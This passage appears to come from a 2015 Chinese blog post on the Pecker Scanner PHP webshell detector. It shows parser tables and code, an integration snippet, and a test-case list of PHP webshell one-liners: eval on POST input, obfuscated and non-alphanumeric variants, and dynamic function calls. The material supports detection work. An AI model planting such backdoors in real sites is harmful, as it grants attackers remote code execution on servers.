-2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, 0, 0, 0, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 163, 163, 163, 163, 163, 163, 163, 163, 163, 163, 163, 124, 124, 124, 124, 124, 124, 124, 124, 0, 271, 271, 271, 271, 72, 72, 72, 163, 163, 163, 163, 163, 163, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 72, 72, 271, 271, 163, 163, -24, -24, -24, -24, -24, -50, -50, -50, 146, -24, -50, 149, 149, 149, -50, -50, -50, 146, 0, 0, 0, 0, 0, 0, 0, 149, 0, 0, 0, 432, 618, 0, 0, 0, 149, 316, 316, 316, 316, 214, 182, 0, 495, 432, 0, 439, 432, 0, 0, 0, 618, 0, 0, 0, 0, 0, 0, 338, 532, 333, 495, 0, 0, 0, 0, 0, 0, 0, 495, 217, 217, 0, 0, 409, 0, 0, 0, 0, 333, 0, 0, 214 ); protected static $yydefault = array( 3,32767,32767, 1,32767,32767,32767,32767,32767,32767, 32767,32767,32767,32767,32767,32767, 106, 98, 112, 97, 108,32767,32767,32767,32767,32767,32767,32767,32767,32767, 32767, 377, 377,32767, 334,32767,32767,32767,32767,32767, 32767,32767,32767, 179, 179, 179,32767,32767,32767, 366, 366, 366, 366, 366, 366, 366, 366, 366, 366,32767, 32767,32767,32767,32767, 257,32767,32767,32767,32767,32767, 32767,32767,32767,32767,32767,32767,32767,32767,32767,32767, 32767,32767,32767,32767,32767,32767,32767,32767,32767,32767, 32767,32767,32767,32767,32767,32767,32767,32767,32767,32767, 32767,32767,32767,32767,32767,32767,32767,32767,32767,32767, 32767,32767,32767,32767,32767,32767,32767,32767,32767,32767, 32767,32767,32767,32767,32767,32767,32767,32767,32767,32767, 32767,32767,32767,32767, 262, 382,32767,32767,32767,32767, 32767,32767,32767,32767,32767,32767,32767,32767,32767,32767, 32767,32767,32767,32767,32767, 238, 239, 241, 242, 178, 367, 131, 263, 381, 177, 205, 207, 256, 206, 183, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 182, 235, 234, 203, 331, 331, 334,32767,32767, 32767,32767,32767,32767,32767,32767, 204, 208, 210, 209, 225, 226, 223, 224, 181, 227, 228, 229, 230, 163, 163, 163,32767,32767, 376, 376,32767,32767,32767,32767, 32767,32767,32767,32767,32767,32767,32767,32767, 164,32767, 217, 218, 292, 292, 122, 122, 122, 122, 122,32767, 32767,32767,32767,32767, 300,32767,32767,32767,32767,32767, 302,32767, 212, 213, 211,32767,32767,32767,32767,32767, 32767,32767,32767,32767, 339, 301,32767,32767,32767,32767, 32767,32767,32767,32767, 352, 288,32767,32767,32767, 281, 32767, 109, 111, 61, 318,32767,32767,32767,32767,32767, 357,32767,32767,32767, 17,32767,32767,32767, 389, 352, 32767,32767, 19,32767,32767,32767,32767, 233,32767,32767, 356, 350,32767,32767,32767,32767,32767, 65, 297,32767, 303,32767,32767,32767, 65,32767,32767,32767,32767, 65, 32767, 355, 354, 65,32767, 282, 333,32767, 65, 76, 32767, 74,32767, 95, 95,32767,32767, 78, 329, 345, 32767,32767, 65,32767, 270, 333,32767,32767, 270, 65, 32767,32767, 4, 307,32767,32767,32767,32767,32767,32767, 32767,32767,32767,32767,32767,32767,32767,32767, 283,32767, 32767,32767, 253, 254, 341,32767, 342,32767, 281,32767, 221, 200,32767, 202,32767,32767, 286, 289,32767,32767, 32767, 140,32767, 284,32767, 186,32767,32767,32767,32767, 384,32767,32767, 180,32767,32767,32767, 136,32767, 63, 32767, 374,32767,32767, 350, 285, 214, 215, 216,32767, 32767,32767,32767,32767,32767,32767,32767, 351,32767,32767, 32767, 116,32767, 318,32767,32767,32767, 77,32767, 184, 132,32767,32767, 383,32767,32767,32767,32767,32767,32767, 338,32767,32767,32767, 64,32767,32767, 79,32767,32767, 350,32767,32767,32767,32767, 120,32767,32767,32767, 175, 32767,32767,32767,32767,32767, 350,32767,32767,32767,32767, 32767,32767,32767,32767, 4,32767, 157,32767,32767,32767, 32767,32767,32767,32767, 25, 25, 3, 25, 103, 25, 143, 3, 95, 95, 58, 143, 25, 143, 25, 25, 25, 25, 25, 25, 25, 150, 25, 25, 25, 25, 25 ); protected static $yygoto = array( 161, 135, 135, 140, 135, 161, 136, 137, 138, 143, 145, 169, 163, 159, 159, 159, 159, 140, 140, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 155, 156, 157, 158, 167, 134, 750, 751, 390, 753, 774, 775, 776, 777, 778, 779, 780, 782, 718, 139, 141, 142, 144, 165, 166, 168, 184, 196, 197, 198, 199, 200, 201, 202, 203, 205, 206, 207, 208, 230, 231, 252, 253, 254, 426, 427, 428, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 146, 147, 148, 162, 149, 164, 150, 182, 151, 152, 153, 183, 154, 132, 443, 443, 443, 443, 443, 443, 443, 443, 443, 443, 443, 311, 485, 421, 421, 449, 417, 419, 419, 391, 393, 410, 424, 450, 453, 464, 470, 335, 335, 335, 335, 335, 335, 335, 335, 335, 335, 335, 335, 335, 335, 335, 335, 646, 646, 906, 906, 813, 813, 654, 654, 654, 654, 654, 405, 538, 538, 538, 495, 444, 444, 444, 444, 444, 444, 444, 444, 444, 444, 444, 611, 611, 611, 611, 270, 606, 612, 490, 392, 392, 392, 392, 392, 392, 392, 392, 392, 392, 392, 392, 392, 392, 392, 392, 539, 539, 539, 582, 395, 395, 5, 878, 16, 210, 6, 211, 396, 396, 537, 537, 537, 7, 422, 17, 18, 8, 19, 9, 10, 11, 910, 20, 12, 13, 14, 15, 455, 483, 632, 617, 615, 613, 615, 508, 398, 641, 636, 850, 850, 850, 850, 850, 850, 850, 850, 850, 850, 850, 430, 431, 432, 433, 434, 435, 436, 438, 466, 835, 458, 463, 500, 467, 273, 315, 830, 1, 697, 316, 809, 810, 2, 771, 26, 21, 285, 554, 672, 621, 852, 853, 868, 652, 707, 276, 661, 807, 877, 807, 439, 291, 250, 885, 885, 808, 241, 886, 886, 294, 476, 29, 294, 916, 916, 481, 901, 901, 901, 866, 292, 484, 919, 916, 408, 903, 299, 299, 299, 418, 884, 304, 397, 397, 429, 716, 762, 404, 919, 919, 299, 825, 824, 459, 650, 546, 664, 851, 518, 310, 488, 404, 404, 312, 271, 272, 552, 804, 669, 620, 863, 487, 403, 0, 705, 0, 0, 0, 0, 302, 0, 0, 425, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 409 ); protected static $yygcheck = array( 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 38, 38, 38, 38, 38, 38, 38, 38, 38, 38, 38, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 38, 38, 38, 38, 38, 38, 38, 38, 38, 38, 38, 38, 38, 38, 38, 38, 53, 53, 53, 53, 38, 38, 38, 38, 38, 38, 38, 75, 6, 6, 6, 38, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 38, 38, 38, 38, 48, 38, 38, 38, 89, 89, 89, 89, 89, 89, 89, 89, 89, 89, 89, 89, 89, 89, 89, 89, 7, 7, 7, 31, 89, 89, 13, 57, 13, 44, 13, 44, 92, 92, 5, 5, 5, 13, 83, 13, 13, 13, 13, 13, 13, 13, 112, 13, 13, 13, 13, 13, 21, 21, 5, 5, 5, 5, 5, 5, 5, 5, 5, 99, 99, 99, 99, 99, 99, 99, 99, 99, 99, 99, 84, 84, 84, 84, 84, 84, 84, 84, 84, 57, 40, 40, 40, 46, 46, 46, 15, 2, 72, 72, 57, 57, 2, 15, 15, 15, 15, 12, 12, 12, 12, 12, 12, 12, 12, 4, 59, 57, 57, 57, 15, 28, 98, 91, 91, 57, 98, 90, 90, 4, 101, 15, 4, 113, 113, 15, 91, 91, 91, 104, 39, 30, 113, 113, 39, 110, 96, 96, 96, 39, 91, 29, 95, 95, 25, 75, 76, 25, 113, 113, 96, 97, 97, 39, 55, 10, 60, 100, 50, 96, 39, 25, 25, 9, 48, 48, 11, 87, 61, 47, 103, 82, 4, -1, 74, -1, -1, -1, -1, 4, -1, -1, 4, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 75 ); protected static $yygbase = array( 0, 0, -239, 0, 22, 209, 156, 195, 0, 21, 55, 1, 89, -303, 0, -52, 0, 0, 0, 0, 0, 184, 0, 0, -30, 294, 0, 0, 245, 102, 98, 174, -99, 0, 0, 0, 0, 0, -83, -19, 25, 0, 0, 0, -310, 0, 7, -2, -168, 0, 51, 0, 0, -67, 0, 96, 0, -61, 0, 251, 50, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 40, 0, -6, 109, 93, 0, 0, 0, 0, 0, -7, 182, 200, 0, 0, 23, 0, -32, 65, 61, -24, 0, 0, 90, 71, 85, 48, 54, 49, 114, 0, -5, 122, 0, 0, 0, 0, 0, 100, 0, 188, 63, 0 ); protected static $yygdefault = array( -32768, 361, 3, 533, 378, 557, 558, 559, 295, 293, 547, 553, 460, 4, 555, 763, 281, 562, 282, 469, 564, 412, 566, 567, 133, 379, 296, 297, 413, 303, 456, 581, 204, 301, 583, 283, 585, 590, 284, 489, 440, 380, 347, 451, 209, 420, 447, 619, 269, 627, 521, 635, 638, 381, 441, 649, 352, 806, 308, 660, 665, 670, 673, 323, 313, 465, 677, 678, 243, 682, 496, 497, 696, 228, 704, 717, 320, 781, 783, 382, 383, 406, 474, 394, 411, 800, 314, 803, 384, 385, 331, 332, 821, 818, 275, 871, 274, 349, 240, 856, 857, 461, 355, 909, 867, 264, 386, 387, 290, 305, 904, 336, 911, 918, 448 ); protected static $yylhs = array( 0, 1, 2, 2, 4, 4, 3, 3, 3, 3, 3, 3, 3, 3, 3, 8, 8, 10, 10, 10, 10, 9, 9, 11, 13, 13, 14, 14, 14, 14, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 35, 35, 37, 36, 36, 29, 29, 39, 39, 6, 7, 7, 7, 41, 41, 41, 42, 42, 45, 45, 43, 43, 46, 46, 22, 22, 31, 31, 34, 34, 33, 33, 47, 23, 23, 23, 23, 48, 48, 49, 49, 50, 50, 20, 20, 16, 16, 51, 18, 18, 52, 17, 17, 19, 19, 30, 30, 30, 40, 40, 54, 54, 55, 55, 56, 56, 56, 56, 57, 57, 57, 58, 58, 59, 59, 26, 26, 60, 60, 60, 27, 27, 61, 61, 44, 44, 62, 62, 62, 62, 67, 67, 68, 68, 69, 69, 69, 69, 70, 71, 71, 66, 66, 63, 63, 65, 65, 73, 73, 72, 72, 72, 72, 72, 72, 64, 64, 74, 74, 28, 28, 21, 21, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 15, 15, 25, 25, 79, 79, 80, 80, 80, 75, 82, 82, 86, 86, 87, 88, 88, 88, 88, 88, 88, 92, 92, 38, 38, 38, 76, 76, 93, 93, 89, 89, 94, 94, 94, 94, 94, 77, 77, 77, 81, 81, 81, 85, 85, 99, 99, 99, 99, 99, 99, 99, 99, 99, 99, 99, 99, 99, 99, 12, 12, 12, 12, 12, 12, 78, 78, 78, 78, 100, 100, 101, 101, 103, 103, 102, 102, 104, 104, 32, 32, 32, 32, 106, 106, 105, 105, 105, 105, 105, 107, 107, 91, 91, 95, 95, 90, 90, 108, 108, 108, 108, 96, 96, 96, 96, 84, 84, 97, 97, 97, 53, 109, 109, 110, 110, 110, 83, 83, 111, 111, 112, 112, 112, 112, 98, 98, 98, 98, 113, 113, 113, 113, 113, 113, 113, 114, 114, 114 ); protected static $yylen = array( 1, 1, 2, 0, 1, 3, 1, 1, 1, 1, 3, 5, 4, 3, 3, 3, 1, 1, 3, 2, 4, 3, 1, 3, 2, 0, 1, 1, 1, 1, 3, 5, 8, 3, 5, 9, 3, 2, 3, 2, 3, 2, 3, 2, 3, 3, 3, 1, 2, 5, 7, 9, 5, 1, 6, 3, 3, 2, 0, 2, 8, 0, 4, 1, 3, 0, 1, 9, 7, 6, 5, 1, 2, 2, 0, 2, 0, 2, 0, 2, 1, 3, 1, 4, 1, 4, 1, 4, 1, 3, 3, 3, 4, 4, 5, 0, 2, 4, 3, 1, 1, 1, 4, 0, 2, 3, 0, 2, 4, 0, 2, 0, 3, 1, 2, 1, 1, 0, 1, 3, 3, 5, 0, 1, 1, 1, 2, 3, 3, 1, 3, 1, 2, 3, 1, 1, 2, 4, 3, 1, 1, 3, 2, 0, 3, 3, 8, 3, 1, 3, 0, 2, 4, 5, 4, 4, 3, 1, 1, 1, 3, 1, 1, 0, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 3, 1, 3, 3, 1, 0, 1, 1, 3, 3, 4, 4, 1, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 2, 2, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 2, 2, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 3, 5, 4, 4, 4, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 1, 1, 3, 2, 1, 9, 10, 3, 3, 2, 4, 4, 3, 4, 4, 4, 3, 0, 4, 1, 3, 2, 2, 4, 6, 2, 2, 4, 1, 1, 1, 2, 3, 1, 1, 1, 1, 1, 1, 0, 3, 3, 4, 4, 0, 2, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 3, 2, 1, 1, 3, 2, 2, 4, 3, 1, 3, 3, 3, 1, 1, 0, 2, 0, 1, 3, 1, 3, 1, 1, 1, 1, 1, 6, 4, 3, 4, 2, 4, 4, 1, 3, 1, 2, 1, 1, 4, 1, 3, 6, 4, 4, 4, 4, 1, 4, 0, 1, 1, 3, 1, 4, 3, 1, 1, 1, 0, 0, 2, 3, 1, 3, 1, 4, 2, 2, 2, 1, 2, 1, 4, 3, 3, 3, 6, 3, 1, 1, 1 ); protected $yyval; protected $yyastk; protected $stackPos; protected $lexer; protected $errMsg; private $tokens; private $tokensSkip = array(T_WHITESPACE,T_COMMENT,T_DOC_COMMENT,T_ENCAPSED_AND_WHITESPACE); private $tokensVariable = array('{','}'); /** * Creates a parser instance. * * @param PHPParser_Lexer $lexer A lexer */ public function __construct(Pecker_Lexer $lexer) { $this->lexer = $lexer; $this->tokens = array(); } /** * Parses PHP code into a node tree. * * @param string $code The source code to parse * * @return PHPParser_Node[] Array of statements */ public function parse($code) { $bLexed = $this->lexer->startLexing($code); // We start off with no lookahead-token $tokenId = self::TOKEN_NONE; if (!$bLexed) { $this->errMsg = $this->lexer->getError(); return false; } // The attributes for a node are taken from the first and last token of the node. // From the first token only the startAttributes are taken and from the last only // the endAttributes. Both are merged using the array union operator (+). $startAttributes = array('startLine' => 1); $endAttributes = array(); // In order to figure out the attributes for the starting token, we have to keep // them in a stack $attributeStack = array($startAttributes); // Start off in the initial state and keep a stack of previous states $state = 0; $stateStack = array($state); // AST stack (?) $this->yyastk = array(); // Current position in the stack(s) $this->stackPos = 0; $this->tokens = $this->lexer->getTokens(); for (;;) { if (self::$yybase[$state] == 0) { $yyn = self::$yydefault[$state]; } else { if ($tokenId === self::TOKEN_NONE) { // Fetch the next token id from the lexer and fetch additional info by-ref. // The end attributes are fetched into a temporary variable and only set once the token is really // shifted (not during read). Otherwise you would sometimes get off-by-one errors, when a rule is // reduced after a token was read but not yet shifted. $origTokenId = $this->lexer->getNextToken($tokenValue, $startAttributes, $nextEndAttributes); // map the lexer token id to the internally used token id's $tokenId = $origTokenId >= 0 && $origTokenId < self::TOKEN_MAP_SIZE ? self::$translate[$origTokenId] : self::TOKEN_INVALID; if ($tokenId === self::TOKEN_INVALID) { $this->errMsg = sprintf('The lexer returned an invalid token (id=%d, value=%s)',$origTokenId, $tokenValue); return false; } $attributeStack[$this->stackPos] = $startAttributes; } if ((($yyn = self::$yybase[$state] + $tokenId) >= 0 && $yyn < self::YYLAST && self::$yycheck[$yyn] == $tokenId || ($state < self::YY2TBLSTATE && ($yyn = self::$yybase[$state + self::YYNLSTATES] + $tokenId) >= 0 && $yyn < self::YYLAST && self::$yycheck[$yyn] == $tokenId)) && ($yyn = self::$yyaction[$yyn]) != self::YYDEFAULT) { /* * >= YYNLSTATE: shift and reduce * > 0: shift * = 0: accept * < 0: reduce * = -YYUNEXPECTED: error */ if ($yyn > 0) { /* shift */ ++$this->stackPos; $stateStack[$this->stackPos] = $state = $yyn; $this->yyastk[$this->stackPos] = $tokenValue; $attributeStack[$this->stackPos] = $startAttributes; $endAttributes = $nextEndAttributes; $tokenId = self::TOKEN_NONE; if ($yyn < self::YYNLSTATES) continue; /* $yyn >= YYNLSTATES means shift-and-reduce */ $yyn -= self::YYNLSTATES; } else { $yyn = -$yyn; } } else { $yyn = self::$yydefault[$state]; } } for (;;) { /* reduce/error */ if ($yyn == 0) { /* accept */ return true; } elseif ($yyn != self::YYUNEXPECTED) { /* reduce try { $this->{'yyn' . $yyn}( $attributeStack[$this->stackPos - self::$yylen[$yyn]] + $endAttributes ); } catch (PHPParser_Error $e) { if (-1 === $e->getRawLine()) { $e->setRawLine($startAttributes['startLine']); } throw $e; } */ /* Goto - shift nonterminal */ $this->stackPos -= self::$yylen[$yyn]; $yyn = self::$yylhs[$yyn]; if (($yyp = self::$yygbase[$yyn] + $stateStack[$this->stackPos]) >= 0 && $yyp < self::YYGLAST && self::$yygcheck[$yyp] == $yyn) { $state = self::$yygoto[$yyp]; } else { $state = self::$yygdefault[$yyn]; } ++$this->stackPos; $stateStack[$this->stackPos] = $state; $this->yyastk[$this->stackPos] = $this->yyval; $attributeStack[$this->stackPos] = $startAttributes; } else { /* error */ $expected = array(); $base = self::$yybase[$state]; for ($i = 0; $i < self::TOKEN_MAP_SIZE; ++$i) { $n = $base + $i; if ($n >= 0 && $n < self::YYLAST && self::$yycheck[$n] == $i || $state < self::YY2TBLSTATE && ($n = self::$yybase[$state + self::YYNLSTATES] + $i) >= 0 && $n < self::YYLAST && self::$yycheck[$n] == $i ) { if (self::$yyaction[$n] != self::YYUNEXPECTED) { if (count($expected) == 4) { /* Too many expected tokens */ $expected = array(); break; } $expected[] = self::$terminals[$i]; } } } $expectedString = ''; if ($expected) { $expectedString = ', expecting ' . implode(' or ', $expected); } $this->errMsg = 'Syntax error, unexpected ' . self::$terminals[$tokenId] . $expectedString .' at line '.$startAttributes['startLine']; return false; } if ($state < self::YYNLSTATES) break; /* >= YYNLSTATES means shift-and-reduce */ $yyn = $state - self::YYNLSTATES; } } return true; } /** * get next tokens after a variable,like curly syntax * @param int $k * @return array */ public function getVariableToken($k) { $result = array(); $res = ''; $fun = ''; for ($i=1;;$i++) { if (isset($this->tokens[$k+$i])) { if (is_array($this->tokens[$k+$i])) { $fun .= $this->tokens[$k+$i][1]; continue; } else { if (in_array($this->tokens[$k+$i],$this->tokensVariable)) { $res = $this->tokens[$k+$i]; break; } $fun .= $this->tokens[$k+$i]; } } else { break; } } $result['token'] = $res; $result['func'] = $fun; $result['key'] = $i-1; return $result; } /** * get next tokens of $k without WHITESPACE * @param int $k * @return string */ public function getNextToken($k) { $res = ''; for ($i=1;;$i++) { if (isset($this->tokens[$k+$i])) { if (is_array($this->tokens[$k+$i])) { if (in_array($this->tokens[$k+$i][0],$this->tokensSkip)) { continue; } else { $res = $this->tokens[$k+$i][1]; break; } } else { $res = $this->tokens[$k+$i]; break; } } else { break; } } return $res; } /** * get previou token of $k without WHITESPACE * @param int $k * @return string */ public function getPreToken ($k) { $res = ''; for ($i = 1; $k - $i >= 0; $i ++) { if (isset($this->tokens[$k - $i])) { if (is_array($this->tokens[$k - $i])) { if (in_array($this->tokens[$k-$i][0],$this->tokensSkip)) { continue; } else { $res = $this->tokens[$k - $i][1]; break; } } else { $res = $this->tokens[$k - $i]; break; } } else { break; } } return $res; } /** * get a piece token of the token after $k,and end with ; OR T_CLOSE_TAG * @param int $k * @return string */ public function getFilepathToken($k) { $str = ''; for ($i = 1;; $i ++) { if (isset($this->tokens[$k + $i])) { if (is_array($this->tokens[$k + $i])) { if ($this->tokens[$k + $i][0] == T_WHITESPACE) { continue; } elseif($this->tokens[$k + $i][0] == T_CLOSE_TAG) { break; } else { $str .= trim(trim($this->tokens[$k + $i][1],'"'),'\''); } } else { if ($this->tokens[$k + $i] == ';' || ($this->tokens[$k + $i] == ')' && $this->getNextToken($k + $i) == ';') || ($this->tokens[$k + $i] == ')' && $this->getNextToken($k + $i) == '.')) { break; } elseif ($this->tokens[$k + $i] == '.') { $str = ''; continue; } $str .= $this->tokens[$k + $i]; } } else { break; } } return $str; } /** * get all token from $k to END TOKEN. (T_CLOSE_TAG or ;) * @param int $k * @return string */ public function getPieceTokenAll ($k) { $str = $str1 = ''; $l = $r = 0; for ($i = 1;; $i ++) { if (isset($this->tokens[$k + $i])) { if (is_array($this->tokens[$k + $i])) { if (in_array($this->tokens[$k + $i][0],array(T_CLOSE_TAG))|| ($l != 0 && $l == $r)) { break; } if (!in_array($this->tokens[$k + $i][0],array(T_WHITESPACE,T_COMMENT,T_DOC_COMMENT,T_INLINE_HTML,T_ECHO,T_ENCAPSED_AND_WHITESPACE))) { $str1 .= $this->tokens[$k + $i][1]; } $str .= $this->tokens[$k + $i][1]; } else { if ($this->tokens[$k + $i] == ';' || ($l != 0 && $l == $r)) { break; } if ($this->tokens[$k + $i] == '(') { $l ++; } if ($this->tokens[$k + $i] == ')') { $r ++; } $str .= $this->tokens[$k + $i]; $str1 .= $this->tokens[$k + $i]; } } else { break; } } return array('more'=>$str,'less'=>$str1); } /** * get all tokens * @return array */ public function getTokens() { return $this->tokens; } /** * get error messages * @return string */ public function getErrmsg() { return $this->errMsg; } } class Pecker_Loger { protected $result; private $file; function __construct() { $this->result = array(); } public function setFile($file) { $this->file = $file; $this->result[$this->file] = array('parser' => true,'message'=>'','function'=>array()); } public function errorLog($msg) { $this->result[$this->file]['parser'] = false; $this->result[$this->file]['message'] = $msg; } public function catchLog($func, $line, array $code =array('more'=>'', 'less'=>'')) { $this->result[$this->file]['parser'] = true; $this->result[$this->file]['function'][$func] = isset($this->result[$this->file]['function'][$func]) ? $this->result[$this->file]['function'][$func] : array(); $this->result[$this->file]['function'][$func][] = array('line'=>$line,'codemore'=>$code['more'], 'codeless'=>$code['less']); } public function getReport() { return $this->result; } } ?>
call
/* inject check */ require dirname(__FILE__) .'/PeckerScanner.lite.php'; $scaner = new Pecker_Scanner(); $scaner->scanFileContent($filename,$newvalue); $result = $scaner->getReport(); if (!empty($result[$filename]['function'])) { die("Request Error!"); } /**/
0x4: 测试用例
1. @eval($_POST['op']): 成功 2. @eval(${"_P"."OST"}['op']): 成功 3. @eval($/*aaa*/{"_P"."OST"}['op']): 成功 4. ($_=@$_GET[2]).@$_($_GET[1]): 成功 5. 无字符型: 成功 /* $_=""; $_[+$_]++; $_=$_.""; $___=$_[+""];//A $____=$___; $____++;//B $_____=$____; $_____++;//C $______=$_____; $______++;//D $_______=$______; $_______++;//E $________=$_______; $________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;//O $_________=$________; $_________++;$_________++;$_________++;$_________++;//S $_=$____.$___.$_________.$_______.'6'.'4'.'_'.$______.$_______.$_____.$________.$______.$_______; $________++;$________++;$________++;//R $_____=$_________; $_____++;//T $__=$___.$_________.$_________.$_______.$________.$_____; $__($_("ZXZhbCgkX1BPU1RbMV0p")); */ 6. $k = "{${phpinfo()}}": 成功 7. $a=$POST['a'];$b=$_POST['b'];$a($b): 变量动态执行
Relevant Link:
http://www.cnxct.com/pecker-scanner-beta-release-support-cloud-confirmation/
Copyright (c) 2015 LittleHann All rights reserved
